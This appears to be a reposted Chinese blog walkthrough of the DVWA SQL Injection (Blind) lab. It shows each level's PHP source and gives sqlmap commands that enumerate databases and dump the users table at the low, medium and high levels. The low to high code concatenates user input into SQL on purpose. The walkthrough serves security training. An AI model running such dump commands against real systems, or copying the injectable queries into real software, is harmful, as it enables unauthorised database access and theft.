devbox
Cpp五条
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

DVWA靶场-SQL Injection (Blind) SQL盲注_搭建dvwa实验靶场,选择medium级别,选择sql injection(blind)的表名的代码

作者:Cpp五条 | 2024-03-19 10:00:27

搭建dvwa实验靶场,选择medium级别,选择sql injection(blind)的表名的代码

往期博文:

DVWA靶场-Brute Force Source 暴力破解

DVWA靶场-Command Injection 命令注入

DVWA靶场-CSRF 跨站请求伪造

DVWA靶场-File Inclusion 文件包含

DVWA靶场-File Upload 文件上传

DVWA靶场-SQL Injection SQL注入

靶场环境搭建

https://github.com/ethicalhack3r/DVWA

[网络安全学习篇附]:DVWA 靶场搭建

 

目录

 

SQL Injection (Blind)

Low SQL Injection (Blind)

核心代码

Medium SQL Injection (Blind)

核心代码

High SQL Injection (Blind)

核心代码

Impossible SQL Injection (Blind)

核心代码

SQL Injection (Blind)

Low SQL Injection (Blind)

核心代码

  1. <?php 
  2.  
  3. ifisset$_GET'Submit' ] ) ) {
  4.  
  5.     // 获取id值
  6.  
  7.     $id $_GET'id' ]; 
  8.  
  9.     // 查询数据库
  10.  
  11.     $getid  "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
  12.  
  13.     $result mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); 
  14.  
  15.     // 得到结果
  16.  
  17.     $num = @mysqli_num_rows$result ); 
  18.  
  19.     if$num 0 ) {
  20.  
  21.         echo '<pre>User ID exists in the database.</pre>';
  22.  
  23.     }
  24.  
  25.     else {
  26.  
  27.             header$_SERVER'SERVER_PROTOCOL' ] . ' 404 Not Found' );
  28.  
  29.         echo '<pre>User ID is MISSING from the database.</pre>';
  30.  
  31.     } 
  32.  
  33.     ((is_null($___mysqli_res mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
  34.  
  35. } 
  36.  
  37. ?>

由于sql 盲注比较浪费时间,笔者这里使用sqlmap 工具进行注入

列出当前数据库名

sqlmap -u "http://192.168.1.200/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5c5k95olhvmj2q6k3d6fuu1995" --current-db

列出表名

sqlmap -u "http://192.168.1.200/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5c5k95olhvmj2q6k3d6fuu1995" -D dvwa1 --tables

获取users 表中数据

sqlmap -u "http://192.168.1.200/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5c5k95olhvmj2q6k3d6fuu1995" -D dvwa1 -T users --dump --batch

 

Medium SQL Injection (Blind)

核心代码

  1. <?php 
  2.  
  3. ifisset$_POST'Submit' ]  ) ) {
  4.  
  5.     // Get input
  6.  
  7.     $id $_POST'id' ];
  8.  
  9.     $id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); 
  10.  
  11.     // Check database
  12.  
  13.     $getid  "SELECT first_name, last_name FROM users WHERE user_id = $id;";
  14.  
  15.     $result mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors 
  16.  
  17.     // Get results
  18.  
  19.     $num = @mysqli_num_rows$result ); // The '@' character suppresses errors
  20.  
  21.     if$num 0 ) {
  22.  
  23.         // Feedback for end user
  24.  
  25.         echo '<pre>User ID exists in the database.</pre>';
  26.  
  27.     }
  28.  
  29.     else {
  30.  
  31.         // Feedback for end user
  32.  
  33.         echo '<pre>User ID is MISSING from the database.</pre>';
  34.  
  35.     } 
  36.  
  37.     //mysql_close();
  38.  
  39. } 
  40.  
  41. ?>

可以很明显的看到,这里提交方式由原来的get 变为了post

使用bp 抓包,抓到post请求的数据包,将其保存至post.r 文件中

vim post.r

sqlmap -r post.r -D dvwa1 -T users --dump --batch

 

High SQL Injection (Blind)

核心代码

  1. <?php 
  2.  
  3. ifisset$_COOKIE'id' ] ) ) {
  4.  
  5.     // Get input
  6.  
  7.     $id $_COOKIE'id' ]; 
  8.  
  9.     // Check database
  10.  
  11.     $getid  "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
  12.  
  13.     $result mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors 
  14.  
  15.     // Get results
  16.  
  17.     $num = @mysqli_num_rows$result ); // The '@' character suppresses errors
  18.  
  19.     if$num 0 ) {
  20.  
  21.         // Feedback for end user
  22.  
  23.         echo '<pre>User ID exists in the database.</pre>';
  24.  
  25.     }
  26.  
  27.     else {
  28.  
  29.         // Might sleep a random amount
  30.  
  31.         ifrand05 ) == 3 ) {
  32.  
  33.             sleeprand24 ) );
  34.  
  35.         } 
  36.  
  37.         // User wasn't found, so the page wasn't!
  38.  
  39.         header$_SERVER'SERVER_PROTOCOL' ] . ' 404 Not Found' ); 
  40.  
  41.         // Feedback for end user
  42.  
  43.         echo '<pre>User ID is MISSING from the database.</pre>';
  44.  
  45.     } 
  46.  
  47.     ((is_null($___mysqli_res mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
  48.  
  49. } 
  50.  
  51. ?>

相较于前面两种,这里id 值由cookie 传递,设置了睡眠时间,增加了盲注的时间耗费

获取当前数据库名

sqlmap -u "http://192.168.1.200/DVWA-master/vulnerabilities/sqli_blind/" --cookie="id=1*; security=high; PHPSESSID=5c5k95olhvmj2q6k3d6fuu1995" --dbms=MySQL --technique=B --random-agent --flush-session -v 3 --current-db

至于用户名和密码,由于太浪费时间,笔者这里就不做赘述了

 

Impossible SQL Injection (Blind)

核心代码

  1. <?php 
  2.  
  3. ifisset$_GET'Submit' ] ) ) {
  4.  
  5.     // Check Anti-CSRF token
  6.  
  7.     checkToken$_REQUEST'user_token' ], $_SESSION'session_token' ], 'index.php' ); 
  8.  
  9.     // Get input
  10.  
  11.     $id $_GET'id' ]; 
  12.  
  13.     // Was a number entered?
  14.  
  15.     if(is_numeric$id )) {
  16.  
  17.         // Check the database
  18.  
  19.         $data $db->prepare'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
  20.  
  21.         $data->bindParam':id'$id, PDO::PARAM_INT );
  22.  
  23.         $data->execute(); 
  24.  
  25.         // Get results
  26.  
  27.         if$data->rowCount() == 1 ) {
  28.  
  29.             // Feedback for end user
  30.  
  31.             echo '<pre>User ID exists in the database.</pre>';
  32.  
  33.         }
  34.  
  35.         else {
  36.  
  37.             // User wasn't found, so the page wasn't!
  38.  
  39.             header$_SERVER'SERVER_PROTOCOL' ] . ' 404 Not Found' ); 
  40.  
  41.             // Feedback for end user
  42.  
  43.             echo '<pre>User ID is MISSING from the database.</pre>';
  44.  
  45.         }
  46.  
  47.     }
  48.  
  49. } 
  50.  
  51. // Generate Anti-CSRF token
  52.  
  53. generateSessionToken(); 
  54.  
  55. ?>

可以看出,impossible prepare 和 PDO 防御SQL,注入,同时加入了token验证机制,进一步提高其安全性

https://www.sqlsec.com/2020/05/dvwa.html#toc-heading-31

https://www.freebuf.com/articles/web/119467.html

 

 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Cpp五条/article/detail/267489
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号